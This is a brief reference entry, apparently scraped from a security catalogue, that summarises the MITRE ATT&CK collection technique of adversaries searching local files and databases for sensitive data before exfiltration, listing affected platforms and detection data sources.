Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre